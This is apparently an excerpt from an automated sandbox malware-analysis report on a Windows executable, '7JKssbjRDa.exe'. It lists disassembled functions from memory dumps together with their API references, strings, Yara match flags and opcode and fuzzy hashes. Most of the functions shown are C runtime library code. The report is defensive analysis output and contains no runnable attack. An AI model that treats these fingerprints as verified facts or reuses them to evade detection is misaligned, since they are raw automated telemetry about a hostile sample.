Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction ID: dd69b49a0ef58960c3fe2e0ca1513683c19ea7e9878b580f0b6b2268387d8ef6
Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction Fuzzy Hash: C621AD76A00108BFDB42EF94D840EDD7BB5FF08244F00856AF615AB161DB31E645CB90

Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10006D6E

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 10006D7A
_free.LIBCMT ref: 10006D85
_free.LIBCMT ref: 10006D90
_free.LIBCMT ref: 10006D9B
_free.LIBCMT ref: 10006DA6
_free.LIBCMT ref: 10006DB1
_free.LIBCMT ref: 10006DBC
_free.LIBCMT ref: 10006DC7
_free.LIBCMT ref: 10006DD5

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91

Function 0041A609 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0041A622

Strings

sqrt, xrefs: 0041A761
asin, xrefs: 0041A74F
log10, xrefs: 0041A664, 0041A673
acos, xrefs: 0041A758
exp, xrefs: 0041A6A1, 0041A706
log, xrefs: 0041A67F, 0041A68E
pow, xrefs: 0041A6C0, 0041A76A, 0041A7B7

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E

Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 10004250
___TypeMatch.LIBVCRUNTIME ref: 1000435E
_UnwindNestedFrames.LIBCMT ref: 100044B0
CallUnexpected.LIBVCRUNTIME ref: 100044CB

Strings

csm, xrefs: 100041DB
csm, xrefs: 10004287
csm, xrefs: 1000416E

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99

Function 10008F36 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 10008F60
_free.LIBCMT ref: 10009039
_free.LIBCMT ref: 10009066

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51

Function 04B492EF Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B492CD), ref: 04B492FB
GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B492CD), ref: 04B49306
GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B492CD), ref: 04B49317
GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B49329
GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B49337
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B492CD), ref: 04B4935A
RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B49376
CloseHandle.KERNEL32(0042AF60,?,?,04B492CD), ref: 04B49386

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID:
API String ID: 2565136772-0
Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction ID: 096d5d5beab73883d0c31ded6276062fec5c07aa1a4af502f75caaa1d3304148
Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction Fuzzy Hash: 0B01B5F1F40321ABD7202F74AD09B9B3BA8EBCDB11B594071FD05D21A4DBACD4019A6A

Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 1000291D
___scrt_uninitialize_crt.LIBCMT ref: 10002937

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1

Function 0040ABE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040AC17
___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
_ValidateLocalCookies.LIBCMT ref: 0040ACA8
__IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
_ValidateLocalCookies.LIBCMT ref: 0040AD28

Strings

csm, xrefs: 0040ACBD

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA

Function 04CF9FE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 04CFA017
___except_validate_context_record.LIBVCRUNTIME ref: 04CFA01F
_ValidateLocalCookies.LIBCMT ref: 04CFA0A8
__IsNonwritableInCurrentImage.LIBCMT ref: 04CFA0D3
_ValidateLocalCookies.LIBCMT ref: 04CFA128

Strings

csm, xrefs: 04CFA0BD

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: 02ed3da176320049f94a72230680090ba0795208dd5a9570a4d9163b30b2759e
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: 4B41E534A00208EFDF50DF68DC84A9EBBB6EF45318F148055EE199B391D73ABA15CB91

Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 10003A57
___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
_ValidateLocalCookies.LIBCMT ref: 10003AE8
__IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
_ValidateLocalCookies.LIBCMT ref: 10003B68

Strings

csm, xrefs: 10003AFD

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91

Function 0041611C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\7JKssbjRDa.exe, xrefs: 00416121
obA, xrefs: 0041616D

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\7JKssbjRDa.exe$obA
API String ID: 0-2677301496
Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8

Function 00411B4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00411BB5
api-ms-, xrefs: 00411BA1

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8

Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 10007353
ext-ms-, xrefs: 10007367

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1

Function 00417082 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F

_free.LIBCMT ref: 004170D0

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 004170DB
_free.LIBCMT ref: 004170E6
_free.LIBCMT ref: 0041713A
_free.LIBCMT ref: 00417145
_free.LIBCMT ref: 00417150
_free.LIBCMT ref: 0041715B

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645

Function 04B572E9 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04B572B1: _free.LIBCMT ref: 04B572D6

_free.LIBCMT ref: 04B57337

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B57342
_free.LIBCMT ref: 04B5734D
_free.LIBCMT ref: 04B573A1
_free.LIBCMT ref: 04B573AC
_free.LIBCMT ref: 04B573B7
_free.LIBCMT ref: 04B573C2

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction ID: f3638e34a91a9eb389efc8ebeddf53615fc296e693e6a5b1e9022694aa798f79
Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction Fuzzy Hash: C1117F31A50B08BAE920B7B1DC05FCBF79CEF05704F800858FBAD760B0DA66B5145660

Function 04D06482 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 04D0644A: _free.LIBCMT ref: 04D0646F

_free.LIBCMT ref: 04D064D0
_free.LIBCMT ref: 04D064DB
_free.LIBCMT ref: 04D064E6
_free.LIBCMT ref: 04D0653A
_free.LIBCMT ref: 04D06545
_free.LIBCMT ref: 04D06550
_free.LIBCMT ref: 04D0655B

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction ID: ac17cb0af868b7526b005f1881a5d85344935facab28da11e2c1ee98c68393b6
Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction Fuzzy Hash: 17113D72785B04BAE721BBB0CC06FCB779CEF04708F40C819A69A670D1DA69F5558661

Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC

_free.LIBCMT ref: 1000C60D

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 1000C618
_free.LIBCMT ref: 1000C623
_free.LIBCMT ref: 1000C677
_free.LIBCMT ref: 1000C682
_free.LIBCMT ref: 1000C68D
_free.LIBCMT ref: 1000C698

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1

Function 00417CD3 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
__fassign.LIBCMT ref: 00417EFA
__fassign.LIBCMT ref: 00417F17
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58

Function 04B57F3A Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B57F82
__fassign.LIBCMT ref: 04B58161
__fassign.LIBCMT ref: 04B5817E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B581C6
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B58206
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B582B2

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
Instruction ID: 8606dff038d5312d631dc210a50766c7e4134fa67084ac058c82fc762aa38f79
Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
Instruction Fuzzy Hash: ACD1C970E016489FDF11DFE8D880AEDFBB5FF48304F2840AAE815BB261D631A952CB50

Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
__fassign.LIBCMT ref: 1000B905
__fassign.LIBCMT ref: 1000B922
WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60

Function 0040ADA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E

Function 04B4B00B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,04B4B002,04B4A5C6,04B49C00), ref: 04B4B019
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B4B027
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B4B040
SetLastError.KERNEL32(00000000,04B4B002,04B4A5C6,04B49C00), ref: 04B4B092

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction ID: 5d97d5de8773b9d009742cf9eef0d20d8d296e21d72a888fe39dd23c57b746e0
Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
